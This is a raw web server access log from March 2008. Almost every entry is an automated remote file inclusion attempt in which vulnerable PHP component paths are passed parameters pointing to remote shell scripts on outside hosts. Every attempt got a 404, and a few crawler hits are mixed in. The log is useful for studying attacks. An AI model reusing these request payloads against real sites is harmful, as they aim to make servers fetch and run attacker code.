196.35.158.180 - - [02/Mar/2008:04:00:01 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.143 - - [02/Mar/2008:04:00:04 -0800] "GET /logs/access_080215.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [02/Mar/2008:04:00:04 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [02/Mar/2008:04:00:04 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:04:00:08 -0800] "GET /logs/access_080211.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:04:00:09 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:04:00:09 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:04:00:29 -0800] "GET /logs/access_080117.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:04:00:29 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:04:00:29 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:04:01:58 -0800] "GET /errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:04:01:58 -0800] "GET /logs/errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
89.111.176.28 - - [02/Mar/2008:04:02:49 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.143 - - [02/Mar/2008:04:03:08 -0800] "GET /logs/access_080221.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.108.34 - - [02/Mar/2008:04:03:30 -0800] "GET /logs/access_080120.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.108.34 - - [02/Mar/2008:04:03:44 -0800] "GET /logs/access_071230.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.154 - - [02/Mar/2008:04:03:58 -0800] "GET /logs/access_080122.log//modules/vwar/admin/admin.php?vwar_root=http://www.netmasterservice.de/faq/attachments/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:04:04:02 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:04:04:03 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:04:04:09 -0800] "GET /logs/access_071024.log/index.php?seite=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:04:18 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:04:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:04:18 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:04:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:04:18 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:04:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:04:04:36 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.80.167 - - [02/Mar/2008:04:04:40 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://antihackerlink.or.id/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:04:05:51 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:04:05:51 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
209.85.108.34 - - [02/Mar/2008:04:05:58 -0800] "GET /logs/access_071224.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:04:06:06 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [02/Mar/2008:04:06:07 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:08 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:08 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:09 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:10 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:10 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:10 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.154.215.249 - - [02/Mar/2008:04:06:11 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:12 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:12 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:12 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:12 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:14 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:14 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:16 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:16 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:17 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [02/Mar/2008:04:06:17 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
165.230.110.130 - - [02/Mar/2008:04:06:20 -0800] "GET //index.php?config=1&base_datapath=http://www.kislorodmontag.ru/ru/sitemap.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
165.230.110.130 - - [02/Mar/2008:04:06:20 -0800] "GET /logs//index.php?config=1&base_datapath=http://www.kislorodmontag.ru/ru/sitemap.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:04:06:32 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:04:06:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:06:55 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:06:55 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:06:56 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:06:56 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:06:57 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:06:57 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:07:03 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.187.96 - - [02/Mar/2008:04:07:03 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:07:15 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:07:15 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:07:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:07:20 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:07:21 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:07:26 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:04:07:27 -0800] "GET //skin/zero_vote/error.php?dir=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.47.239.60 - - [02/Mar/2008:04:07:54 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.47.239.60 - - [02/Mar/2008:04:07:54 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [02/Mar/2008:04:08:10 -0800] "GET /logs/access_080131.log/index.php?pagina=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [02/Mar/2008:04:08:10 -0800] "GET /index.php?pagina=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [02/Mar/2008:04:08:11 -0800] "GET /logs/index.php?pagina=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [02/Mar/2008:04:09:26 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:04:09:33 -0800] "GET /include/functions_common.php?gl_root_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:04:09:33 -0800] "GET /logs/include/functions_common.php?gl_root_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:04:10:16 -0800] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:04:10:16 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:04:10:17 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.47.247.136 - - [02/Mar/2008:04:11:43 -0800] "GET /logs/access_080127.log//appserv/main.php?appserv_root=http://h1.ripway.com/bekasihacker/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.189.132 - - [02/Mar/2008:04:12:00 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.mealsvictoria.org.au//wiki/maps/mealsvictoria.org.en/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:04:12:22 -0800] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:04:13:32 -0800] "GET /logs/access_080131.log//Neos_Chronos/header.php?base_folder=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:04:13:39 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:04:13:39 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.133.104.14 - - [02/Mar/2008:04:13:48 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.34 - - [02/Mar/2008:04:14:30 -0800] "GET /bikes/dteel/EQ2/?M=A HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.108 - - [02/Mar/2008:04:14:30 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.75 - - [02/Mar/2008:04:14:31 -0800] "GET /logs/access_080119.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:14:52 -0800] "GET /db.php?path_local=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:14:52 -0800] "GET /logs/db.php?path_local=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:14:52 -0800] "GET /db.php?path_local=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:14:52 -0800] "GET /db.php?path_local=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:14:57 -0800] "GET /logs/db.php?path_local=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:14:57 -0800] "GET /logs/db.php?path_local=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:04:15:06 -0800] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:04:15:10 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:04:15:14 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:04:15:18 -0800] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.153 - - [02/Mar/2008:04:15:23 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:04:15:25 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
